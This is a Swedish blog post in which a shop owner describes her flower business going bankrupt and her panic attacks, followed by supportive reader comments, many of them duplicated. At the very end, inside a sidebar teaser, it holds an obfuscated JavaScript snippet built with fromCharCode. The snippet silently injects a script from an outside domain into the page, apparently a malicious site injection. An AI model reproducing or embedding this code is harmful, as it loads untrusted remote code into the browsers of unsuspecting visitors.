Utreseförbud, omyndigförklarad, inventering, konkurs-ed, tingsrätt, ångest…..

mys blommor, öland, konkurs, handelsträdgård, my martens, expressen, aftonbladet, psykisk ohälsa, konkursförvaltare, tingsrätt, panikångest,

Hej! Vilket dygn! Fy fan rent ut sagt! jag famlar runt i mörker.. Jag är så ledsen! Jag är helt knäckt!

 Igår körde jag och min fantastiska kollega 135 mil tur/retur för att hämta ner sista bokföringen. Det var skönt på sätt och vis, då hade jag ett ”uppdrag” någonting att göra.

Först och främst…. TACK! Tack för alla tio-tusentals mail, sms, samtal, brev, blommor, kramar, kärlek och annat som jag sedan i måndags fått. Jag finner inga ord över min tacksamhet! Det betyder så otroligt mycket!

Tack, tack, tack <3

Att jag inte svarar på ditt mail, sms eller kommentar här inne betyder iNTE att jag inte läser det. Det gör jag. Jag kommer i efterhand att gå in och svara på så mycket jag orkar. Så du är välkommen att fråga, så ska jag svara så gott det går.

Just nu så är jag mitt i konkursen. Allt snurrar på i 180. Jag gråter, skrattar och hyperventilerar om vartannat. Jag känner INTE igen mig själv! 

 Jag ställs inför frågor och situationer som jag inte tidigare varit i….. Konkursförvaltare, jurister, revisorer osv.

Idag har jag och två av mina tjejer varit i butiken. VI väntade på värderingsman och konkursförvaltare. Ångesten kommer och går. Jag kan inte kontrollera den alls. Mina känslor ligger utanpå. Jag får riktiga panikattacker, där jag varken kan andas eller tänka klart. En sådan kom när jag väntade på att tjejerna skulle komma. Jag hade inte tänt upp belysningen i butiken. Jag vill inte att någon skulle se att jag var där. Jag skämdes över mitt ”tillstånd” rödgråten, svullen och som ett vandrande vrak.

Jag satt på golvet, vaggade mig som en bebis. Kramade mina knän och grät oavbrutet! HUR ska jag ta mig ur detta? HUR ska jag kontrollera ångesten?! 

Då kom attacken….. Andningen tar lixom slut. De  känns som om någon stryper mig. Jag blir illamående, jag får panik. Jag har lärt mig genom tidigare attacker att det släpper. men just precis när man får en attack så vet man inte vart man ska ta vägen. Det gör så obeskrivligt ont, man vill lämna sin egna kropp, man vill skrika men inget ljud kommer. Man vrider och vänder sig inombords, men ingenting hjälper. Benen viker sig, man tappar kontrollen på ALLT, känslor, tankar, andning, hållning. Man rasar….   Efter en kvart- tjugo minuter så samlade jag mig. Reste mig upp från det kalla golvet och sköljde ansiktet i kallt vatten.. -kom igen nu My, du klarare detta! Försökte jag intala mig själv framför spegeln. 

 Under tiden som vi inväntade konkursförvaltaren och värderingsmannen så fick jag motvilligt mota ut kunder. Ca 50 stycken. Jag kunde inte hålla tårarna borta, utan fick artigt men bestämt förklara att ”Nej tyvärr, butiken har gått i konkurs, jag får tyvärr inte släppa in någon” Jag är ledsen, det är inte jag som bestämmer men det är så det är.

 Därefter strömmade tårarna igen, jag minns inte vad kunderna frågade och ännu mindre vad jag svarade. Alla beklagade och lyckönskade… 

Vad händer nu??? Det är många steg kvar innan konkursen är klar. Först och främst så är jag ”omyndigförklarad” och får inte ta några egna beslut. Jag ska bara vara tillgänglig och underlätta på alla sätt jag kan. USCH! Butiken ser så tom, död och skrämmande ut. Det gör ont att vara där….

-Mitt livsverk har på bara några dagar förvandlats till en kyrkogård. Grå, kall, och död. 

P7061321 (4)

 Några saker konkursförvaltaren har upplyst mig om och lärt mig är följande: 

Jag har tillfälligt utreseförbud och får alltså inte lämna landen innan jag avlagt konkurseden i Tingsrätten den 31 augusti.

Mitt mobilabonnemang har stängts av. TROTS att jag betalat alla räkningar och flyttat över det till det andra bolaget. DET förklarade konkursförvaltaren var fel. Dom kontaktade operatören och jag hoppas få igång mitt abonnemang under morgondagen och får förhoppningsvis behålla samma nr. Fram tills dess kan ingen nå mig. -SUCK! 

Vilket också blir ett problem för konkursförvaltaren som behöver mig genom hela processen. Vi lämnade butiken för en stund sedan, mailade in sista inventeringen och avslutade.

Nu får vi bara vänta. Vänta på besked.

Besked på OM vi ska ”öppna” butiken för konkursutförsäljning, eller om det ska säljas på auktion på nätet alternativt säljas som ett ”paket” . Gode gud låt oss slippa en konkursutförsäljning, jag klarar inte det! Jag klarar inte av att möta alla människor på samma gång i butiken som nu inte längre är min egen utan tillhör konkursfövalataren.

Men OM jag blir tvungen så ställer jag upp på det. Dom kan nämligen inte tvinga mig till det. Men mina medarbetare… och jag kommer iNTE att lämna dom i sticket utan kommer stå med dom sida vid sida in i det sista och göra det som krävs…… 

Att se min butiks ordagrant slaktas som jag lagt tio år av mitt liv och hela min själ i. Det gör så ont. j*vligt ont.

Att se mina kollegor Evelina och Vickan kämpa sida vid sida med mig genom detta är ovärdeligt! Vilka tjejer, vilka krigare, vilka vänner!

-Nu och för alltid <3  KÄRLEK & RESPEKT! 

mys blommor, öland, konkurs, handelsträdgård, my martens, expressen, aftonbladet, psykisk ohälsa, konkursförvaltare, tingsrätt, panikångest,

Jag har precis kommit ”hem” till min väninnna.

Jag ska bums gå och lägga mig. Jag MÅSTE få sova. Jag klarar inte mycket mer om jag inte får min sömn. Ångesten äter upp mig inifrån… Jag ska på något sätt ta mig upp igen. Jag SKA föröka att gå stark ur detta… 

Ville bara egentligen tacka dig, för ditt stöd! Och ge dig en snabb uppdatering om vad som händer.  En sak i taget, en dag i taget… Stor kram

/ My Martens

Jag vet inte varför jag plågar mig… men jag sitter och googlar upp gamla bilder… och där rinner tårarna igen! 

image129

image.php

912@70

image.php-2

my

 

97 Komentarer

 1. Brukar aldrig kommentera men vill skicka massor styrkekramar!! Hoppas du kan hitta nya vägar och att du blir stärkt av denna resa. Tänker på dig! ❤️

 2. Har tänkt på dig o hur du har det o förstår att du har mycket att stå i som det ser ut just nu. Du kämpar på med oförminskad styrka o du gör allt rätt o så bra! Så väl mitt i allt att du har stöd av dina tjejer från butiken o att du bor hos en vän. Du behöver stöd nu o så mycket som du ger av dig själv så får du oxå tillbaka – så fungerar ju karma.
  Mitt i sorgen och turbulensen av att Mys blommor försatts i konkurs så lyser ändå din kämpaglöd. Du har många som tänker o hejar på Dig.
  Tack för att du mitt i allt ditt jobbiga ändå hör av dig med ett inlägg på din blogg. Jag sänder många varma kramar med energi i till dig. Du gör allt du kan o mer därtill o du gör det så bra! ❤️

 3. Har gått igenom detta själv, hade en god vän som sa att det är bara at gå vidare, folk snackar, det är värst när det står i tidningen och ett år senare när det meddelas om utdelning el inte, folk glömmer. Försök att att inte ta på dig en massa privat för att rensa upp för att va snäll det kostar bara mer, man går personligt på knäna. Lycka till och se framåt över muren och njut av grabben, vännerna och livet!

 4. Kära, kära My! Som du själv säger; en dag i taget! Jag kan inte föreställa mig vad du just nu går igenom, vill bara säga att jag tänker på dig. Sänder en stor kram till dig! Vilken tjej du är! ❤️

 5. Usch vad jag lider med dig. Det måste vara otroligt tufft att lämna något som man byggt upp och drivit så länge. Hoppas att panikångesten lägger sig och att du så småningom kan vila upp dig ordentligt. Försök att spendera tid med folk som ger dig energi och glädje. Styrkekramar

 6. Du gör verkligen allt, och det rätt hela vägen. Vi är många som tänker på dig och din son, vi är många som har varma tankar om dig, och vi hejar på dig varje dag och vet att du kommer att gå stark ur detta.
  Fortsätt gå rak i ryggen, du om någon har all rätt att vara stolt över dig själv, vilken kämparglöd du har, vilken medmänniska du är gentemot andra trots att du har det så svårt själv, just nu.
  All omtanke till dig

 7. Hej igen,
  känner igen det du går igenom.,
  Lärorikt är det i alla fall.
  I mitt fall blev det till och med en personlig kk, då jag drev min butik som enskild firma. INTE att rekommendera.
  Våra svenska konkurslagar är stenåldern och helt sjuka.
  För att inte tala om bankens agerande efter en konkurs, ännu värre.
  Nu har det gått tre år, och det svider fortfarande.
  Allt pga att kunderna svikit och börjat handla på nääätet.
  Så mitt råd är, borsta av dig, spänn musklerna, och visa att du också finns till. Alla kan misslyckas, och mycket pga yttre omständigheter.
  Nya tider kommer.,,
  Kram på dig!

 8. Som du kämpar med allt du tvingas gå igenom nu och ändå orkar uppdatera bloggen är otroligt starkt gjort av dig. I det skicket du befinner dig i nu finns inte många som skulle klara av det. Du är en stark persons. Skickar lite extra styrka och cyperkramar och önskar att du snart känner dig bättre och ser ljuset i tunnel.
  Kram

 9. Oj vad ledsen jag blir My. Har inte tittat in här på länge och har missat så mycket märker jag. Har själv haft panikångest men lärt mig att hantera det. Jag tog hjälp av tabletter men det har även hjälpt mig att bara följa med i ångesten. Inte motarbetat den för då blev det värre för mig. Köpte godispåsar i papper som jag andades i när en attack kom. Det hjälpte! Idag har jag ingen ångest och så kommer det att bli för dig med. Antar att väninnan du nämner är Magdalena Graaf. Skönt att hon har kommit hem till Sverige igen. Ni verkar ha ett så speciellt vänskapsband. Skönt att kunna vara sig själv med de bästa av vänner. Om ett par år så hoppas jag att du kommer att se denna svåra tid som början på något nytt mycket bättre. Styrkekramar till dig fina My!

 10. Brukar aldrig kommentera men vill skicka massor styrkekramar!! Hoppas du kan hitta nya vägar och att du blir stärkt av denna resa. Tänker på dig! ❤️

 11. Har tänkt på dig o hur du har det o förstår att du har mycket att stå i som det ser ut just nu. Du kämpar på med oförminskad styrka o du gör allt rätt o så bra! Så väl mitt i allt att du har stöd av dina tjejer från butiken o att du bor hos en vän. Du behöver stöd nu o så mycket som du ger av dig själv så får du oxå tillbaka – så fungerar ju karma.
  Mitt i sorgen och turbulensen av att Mys blommor försatts i konkurs så lyser ändå din kämpaglöd. Du har många som tänker o hejar på Dig.
  Tack för att du mitt i allt ditt jobbiga ändå hör av dig med ett inlägg på din blogg. Jag sänder många varma kramar med energi i till dig. Du gör allt du kan o mer därtill o du gör det så bra! ❤️

 12. Har gått igenom detta själv, hade en god vän som sa att det är bara at gå vidare, folk snackar, det är värst när det står i tidningen och ett år senare när det meddelas om utdelning el inte, folk glömmer. Försök att att inte ta på dig en massa privat för att rensa upp för att va snäll det kostar bara mer, man går personligt på knäna. Lycka till och se framåt över muren och njut av grabben, vännerna och livet!

 13. Kära, kära My! Som du själv säger; en dag i taget! Jag kan inte föreställa mig vad du just nu går igenom, vill bara säga att jag tänker på dig. Sänder en stor kram till dig! Vilken tjej du är! ❤️

 14. Fina blomsterflicka, jag beundrar dig mycket. Så du kämpar och kämpat i ditt liv. Hoppas du snart får en ordnad tillvaro igen. Många kramar ❤️

 15. Usch vad jag lider med dig. Det måste vara otroligt tufft att lämna något som man byggt upp och drivit så länge. Hoppas att panikångesten lägger sig och att du så småningom kan vila upp dig ordentligt. Försök att spendera tid med folk som ger dig energi och glädje. Styrkekramar

 16. Du gör verkligen allt, och det rätt hela vägen. Vi är många som tänker på dig och din son, vi är många som har varma tankar om dig, och vi hejar på dig varje dag och vet att du kommer att gå stark ur detta.

  Fortsätt gå rak i ryggen, du om någon har all rätt att vara stolt över dig själv, vilken kämparglöd du har, vilken medmänniska du är gentemot andra trots att du har det så svårt själv, just nu.

  All omtanke till dig

 17. Hej igen,
  känner igen det du går igenom.,
  Lärorikt är det i alla fall.
  I mitt fall blev det till och med en personlig kk, då jag drev min butik som enskild firma. INTE att rekommendera.
  Våra svenska konkurslagar är stenåldern och helt sjuka.
  För att inte tala om bankens agerande efter en konkurs, ännu värre.
  Nu har det gått tre år, och det svider fortfarande.
  Allt pga att kunderna svikit och börjat handla på nääätet.
  Så mitt råd är, borsta av dig, spänn musklerna, och visa att du också finns till. Alla kan misslyckas, och mycket pga yttre omständigheter.
  Nya tider kommer.,,
  Kram på dig!

 18. Som du kämpar med allt du tvingas gå igenom nu och ändå orkar uppdatera bloggen är otroligt starkt gjort av dig. I det skicket du befinner dig i nu finns inte många som skulle klara av det. Du är en stark persons. Skickar lite extra styrka och cyperkramar och önskar att du snart känner dig bättre och ser ljuset i tunnel.
  Kram

 19. Oj vad ledsen jag blir My. Har inte tittat in här på länge och har missat så mycket märker jag. Har själv haft panikångest men lärt mig att hantera det. Jag tog hjälp av tabletter men det har även hjälpt mig att bara följa med i ångesten. Inte motarbetat den för då blev det värre för mig. Köpte godispåsar i papper som jag andades i när en attack kom. Det hjälpte! Idag har jag ingen ångest och så kommer det att bli för dig med. Antar att väninnan du nämner är Magdalena Graaf. Skönt att hon har kommit hem till Sverige igen. Ni verkar ha ett så speciellt vänskapsband. Skönt att kunna vara sig själv med de bästa av vänner. Om ett par år så hoppas jag att du kommer att se denna svåra tid som början på något nytt mycket bättre. Styrkekramar till dig fina My!

 20. Är uppriktigt ledsen för din skull. Har bott på Öland och följt dig sen du startade……innan du gjorde gula huset i Arontorp till en sagolik oas. En dag i taget My…det ordnar sig till slut ♡ kram från mig

 21. Är uppriktigt ledsen för din skull. Har bott på Öland och följt dig sen du startade……innan du gjorde gula huset i Arontorp till en sagolik oas. En dag i taget My…det ordnar sig till slut ♡ kram från mig

 22. Åh My!! Du klarar det. Panikattackerna lär man sig att hantera och även om man inte tror på det så går de till slut över (även om de kan komma tillbaka senare). Lycka till tjejen! Styrkekramar

 23. Hej My!
  Vilken otroligt stark och härlig tjej du är. Delar med dig av allt i ditt liv…tom detta som är sååå otroligt jobbigt
  Men kan du inte med sitt andra bolag köpa butiken å starta upp igen! Du vet ju att de går….du kan inte bara lämna de nu…kunderna finns kvar om inte fler efter allt detta.
  Är själv egenföretagare så vet vad ens företag betyder!
  Stor kram My från mig Ulrika (från Lund, Skåne)

 24. hej my,
  sänder dej ljus och kärlek från Holland,
  många styrkekramar till dej du är en stark tjej .
  efter moln kommer solsken,
  du e värd de bästa.
  styrkekramar från mia e

 25. Fina My du tar igenom dej det här , det tar lite tid bara ! Men dom sagt du är o verkar vara driftig tjej ! Omge dig bara med vänner som ger dig godenergi ! När släpps din bok ? Ser fram emot o läsa den ! Styrkekramar

 26. Åh My!! Du klarar det. Panikattackerna lär man sig att hantera och även om man inte tror på det så går de till slut över (även om de kan komma tillbaka senare). Lycka till tjejen! Styrkekramar

 27. Hej My!
  Vilken otroligt stark och härlig tjej du är. Delar med dig av allt i ditt liv…tom detta som är sååå otroligt jobbigt

  Men kan du inte med sitt andra bolag köpa butiken å starta upp igen! Du vet ju att de går….du kan inte bara lämna de nu…kunderna finns kvar om inte fler efter allt detta.
  Är själv egenföretagare så vet vad ens företag betyder!
  Stor kram My från mig Ulrika (från Lund, Skåne)

 28. hejsan jag beklagar din läge.det skämpigt och tufft pga folk vill inte betala för saker som de vill ha.det är ju även skatterna och utgifter osv regler.tyvärr kommer de stora unnan med allt nästan och de mellan stora och små gör allt som man måste och de stora kommer undan med det. jag tycker som du haft mycket folk hela tiden nästan.har du haft förlåga priser eller du haft för litemaginal.jag beklagar verkligen och önskar dig lycka till med det nya du ska göra.

 29. hej my,

  sänder dej ljus och kärlek från Holland,
  många styrkekramar till dej du är en stark tjej .
  efter moln kommer solsken,
  du e värd de bästa.
  styrkekramar från mia e

 30. Du kommer klara detta, My. För att du måste.
  Det som har varit, har varit, tänk att du måste se framåt.
  Även om man inte tror det så kommer det något gott ur allt detta till slut.
  Ibland finns det en mening med det som sker även om det kan vara svårt för stunden att se det.
  Kramar!!!

 31. Fina My du tar igenom dej det här , det tar lite tid bara ! Men dom sagt du är o verkar vara driftig tjej ! Omge dig bara med vänner som ger dig godenergi ! När släpps din bok ? Ser fram emot o läsa den ! Styrkekramar

 32. Vilken kämpe du är! Tack för att du delar med dig mitt i kaoset. Ta hand om dig!
  Många styrkekramar med energi till dig

 33. hejsan jag beklagar din läge.det skämpigt och tufft pga folk vill inte betala för saker som de vill ha.det är ju även skatterna och utgifter osv regler.tyvärr kommer de stora unnan med allt nästan och de mellan stora och små gör allt som man måste och de stora kommer undan med det. jag tycker som du haft mycket folk hela tiden nästan.har du haft förlåga priser eller du haft för litemaginal.jag beklagar verkligen och önskar dig lycka till med det nya du ska göra.

 34. Beskrivningen av panikångesten är mitt i prick. Det är precis så det känns.
  Massor av kramar till dig och jag vet att du kommer gå stärkt ur detta ♥
  Du har fina människor runt dig ♥ Kämpa igenom skiten, det finns ett slut där borta.
  Tänk så skönt när allt är över ♥ KRAM!!

 35. Du kommer klara detta, My. För att du måste.
  Det som har varit, har varit, tänk att du måste se framåt.
  Även om man inte tror det så kommer det något gott ur allt detta till slut.
  Ibland finns det en mening med det som sker även om det kan vara svårt för stunden att se det.
  Kramar!!!

 36. Kära My! Det kommer att vara kämpigt tills du svurit eden, sen kommer det att lätta något. Vet exakt vad du går igenom, för jag har själv varit där. MEN du är ung My, i motsats till mig. Så du kommer tillbaka till 100%. Jag hade själv oxå gått i personlig borgen.
  Låt det ha sin tid nu fram t slutet av augusti.
  Skickar massor av styrkekramar o var rädd om dig!

 37. Vilken kämpe du är! Tack för att du delar med dig mitt i kaoset. Ta hand om dig!

  Många styrkekramar med energi till dig

 38. Beskrivningen av panikångesten är mitt i prick. Det är precis så det känns.
  Massor av kramar till dig och jag vet att du kommer gå stärkt ur detta ♥
  Du har fina människor runt dig ♥ Kämpa igenom skiten, det finns ett slut där borta.
  Tänk så skönt när allt är över ♥ KRAM!!

 39. Kära My! Det kommer att vara kämpigt tills du svurit eden, sen kommer det att lätta något. Vet exakt vad du går igenom, för jag har själv varit där. MEN du är ung My, i motsats till mig. Så du kommer tillbaka till 100%. Jag hade själv oxå gått i personlig borgen.
  Låt det ha sin tid nu fram t slutet av augusti.
  Skickar massor av styrkekramar o var rädd om dig!

 40. Hej My! Vet verkligen vilket helvete, vilken svår och extremt jobbig situation du gått och går igenom nu. Hur allt detta kommer och påverkar dig på olika sätt, påverkar dig privat, din familj, din omgivning, dina fd anställda, företaget som hyrde delar av dina lokaler, dina kunder och leverantörer osv.
  Hur hela din värld vänds helt upp och ner, allt slit du verkligen lagt ner, alla motgångar du fått gått igenom, alla dina drömmar och visioner du haft, vilka du även genomfört en hel del utav genom dessa åren, kämpat på och byggt upp ditt alldeles egna livsverk. Det är inte många som orkar, kan, vågar eller klarar av allt det du gjort. Att se sitt livsverk försvinna det gör så otroligt ont, inte bara för den enskilde personen utan även för familj, vänner mm. De som aldrig behövt upplevt detta tycker säkert att det bara är trams, handlar ”bara om pengar eller materiella ting” men det handlar om så mycket mer och annat oxå, blod, svett och tårar. Tyvärr är det alltid ägaren/ägarna som ”snällt” bara får stå och ta emot en massa privat skit, alla skyldigheter man personligen har gentemot kreditgivare dvs borgen för checkkrediter, kortkrediter, leasingavgifter och företagslån, alla andra skulder som man oxå kan vara personligt ansvarig för just pga aktiekapitalet varit förbrukat sedan något/några år tillbaka och detta får styrelsen ta ställning till om man vill driva företaget vidare eller inte, väljer man att driva det vidare ändå så står det en anmärkningar om detta i Årsredovisningen och då innebär det även att man är personligt ansvarig för alla företagens skulder, bla alla leverantörsskulder, skatter, moms, löner osv. Jag har läst att du My betalat dina leverantörsskulder och kanske ytterligare några skulder nu med de pengar du fått in via utförsäljningen, mycket bra gjort och kämpat utav dig!!
  Utav allt ont kommer alltid något gott ut, tänk på det. Det finns alltid en mening med allt som sker i livet, oavsett om det är positivt eller negativt.
  Kämpa på och lycka till!!

 41. Varm kram till dig.
  Måste bara säga att du verkar ha så härliga tjejer som har hjälpt dig i butiken och som står kvar vid din sida trots att det blåser.
  Det gamla talesättet ”i nöden prövas vännen” kommer säkert bli aktuellt nu.

 42. Tänker på dig ger dig många styrkekramar. Min butik vad skall jag köpa min blommor nu. Det var alltid så fina blommor så trevliga flickor i affären. Hoppas du hittar något annat att göra i framtiden.

 43. Hej My! Vet verkligen vilket helvete, vilken svår och extremt jobbig situation du gått och går igenom nu. Hur allt detta kommer och påverkar dig på olika sätt, påverkar dig privat, din familj, din omgivning, dina fd anställda, företaget som hyrde delar av dina lokaler, dina kunder och leverantörer osv.

  Hur hela din värld vänds helt upp och ner, allt slit du verkligen lagt ner, alla motgångar du fått gått igenom, alla dina drömmar och visioner du haft, vilka du även genomfört en hel del utav genom dessa åren, kämpat på och byggt upp ditt alldeles egna livsverk. Det är inte många som orkar, kan, vågar eller klarar av allt det du gjort. Att se sitt livsverk försvinna det gör så otroligt ont, inte bara för den enskilde personen utan även för familj, vänner mm. De som aldrig behövt upplevt detta tycker säkert att det bara är trams, handlar ”bara om pengar eller materiella ting” men det handlar om så mycket mer och annat oxå, blod, svett och tårar. Tyvärr är det alltid ägaren/ägarna som ”snällt” bara får stå och ta emot en massa privat skit, alla skyldigheter man personligen har gentemot kreditgivare dvs borgen för checkkrediter, kortkrediter, leasingavgifter och företagslån, alla andra skulder som man oxå kan vara personligt ansvarig för just pga aktiekapitalet varit förbrukat sedan något/några år tillbaka och detta får styrelsen ta ställning till om man vill driva företaget vidare eller inte, väljer man att driva det vidare ändå så står det en anmärkningar om detta i Årsredovisningen och då innebär det även att man är personligt ansvarig för alla företagens skulder, bla alla leverantörsskulder, skatter, moms, löner osv. Jag har läst att du My betalat dina leverantörsskulder och kanske ytterligare några skulder nu med de pengar du fått in via utförsäljningen, mycket bra gjort och kämpat utav dig!!

  Utav allt ont kommer alltid något gott ut, tänk på det. Det finns alltid en mening med allt som sker i livet, oavsett om det är positivt eller negativt.

  Kämpa på och lycka till!!

 44. Varm kram till dig.
  Måste bara säga att du verkar ha så härliga tjejer som har hjälpt dig i butiken och som står kvar vid din sida trots att det blåser.
  Det gamla talesättet ”i nöden prövas vännen” kommer säkert bli aktuellt nu.

 45. Tänker på dig ger dig många styrkekramar. Min butik vad skall jag köpa min blommor nu. Det var alltid så fina blommor så trevliga flickor i affären. Hoppas du hittar något annat att göra i framtiden.

 46. Tufft! Ensam är inte stark i sådana tillfällen. Behöver du en neutral oberoende samtalsterapeut så är du välkommen att höra av dig. Prata prata prata är det bästa. Både m vänner o familj. Men även en objektiv person kan ge andra råd.

 47. Starkt jobbat. Det här är inget nederlag. Du har inte lurat någon eller satt någon annan än dig själv i en jobbig situation. Dina medarbetare blir utan jobb men det finns alltid jobb för duktiga personer. Dom kommer klara sig.
  När du tagit dig igenom all formalia så hoppas jag att du tar dig lite tid att andas och hämta dig innan du sätter fart igen. För en person som du kommer alltid ha nya projekt på gång. Använd det här till att lära dig för att göra nästa resa bättre.

 48. Tufft! Ensam är inte stark i sådana tillfällen. Behöver du en neutral oberoende samtalsterapeut så är du välkommen att höra av dig. Prata prata prata är det bästa. Både m vänner o familj. Men även en objektiv person kan ge andra råd.

 49. Åkte förbi din butik i förmiddags! Känns så ofattbart att den inte är öppen längre.. Jag brukade jämt hitta såna fina grejer i din butik! Älskar den fina ängeln som jag köpte till alla Helgona helgen förra året! <3
  Hoppas att din panikångest snart ger med sig och att du kommer få må bra och känna lycka igen!
  Många kramar från en i t-viken där du bodde förut!

 50. Starkt jobbat. Det här är inget nederlag. Du har inte lurat någon eller satt någon annan än dig själv i en jobbig situation. Dina medarbetare blir utan jobb men det finns alltid jobb för duktiga personer. Dom kommer klara sig.

  När du tagit dig igenom all formalia så hoppas jag att du tar dig lite tid att andas och hämta dig innan du sätter fart igen. För en person som du kommer alltid ha nya projekt på gång. Använd det här till att lära dig för att göra nästa resa bättre.

 51. Åkte förbi din butik i förmiddags! Känns så ofattbart att den inte är öppen längre.. Jag brukade jämt hitta såna fina grejer i din butik! Älskar den fina ängeln som jag köpte till alla Helgona helgen förra året! <3
  Hoppas att din panikångest snart ger med sig och att du kommer få må bra och känna lycka igen!
  Många kramar från en i t-viken där du bodde förut!

 52. Fina My, det kommer att ordna sig för dig! Jag lider med dig för jag vet precis vad du går igenom. Var själv med om detsamma för inte så länge sedan, och är en tjej lik dig i samma ålder och med samma frågor, samma ångest och samma frågor. Nu är jag på andra sidan och jag lovar dig, du fixar detta, du kommer tillbaka starkare och modigare men det kommer att påverka dig resten av livet både positivt och negativt. Du känner inte mig men vi har gemensamma bekanta, och om du vill kontakta mig för att prata med någon som förstår eller om du har frågor hur konkurshanteringen går till så har du min mailadress. Önskar dig all lycka och styrka! Kram!

 53. Fina My, det kommer att ordna sig för dig! Jag lider med dig för jag vet precis vad du går igenom. Var själv med om detsamma för inte så länge sedan, och är en tjej lik dig i samma ålder och med samma frågor, samma ångest och samma frågor. Nu är jag på andra sidan och jag lovar dig, du fixar detta, du kommer tillbaka starkare och modigare men det kommer att påverka dig resten av livet både positivt och negativt. Du känner inte mig men vi har gemensamma bekanta, och om du vill kontakta mig för att prata med någon som förstår eller om du har frågor hur konkurshanteringen går till så har du min mailadress. Önskar dig all lycka och styrka! Kram!

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/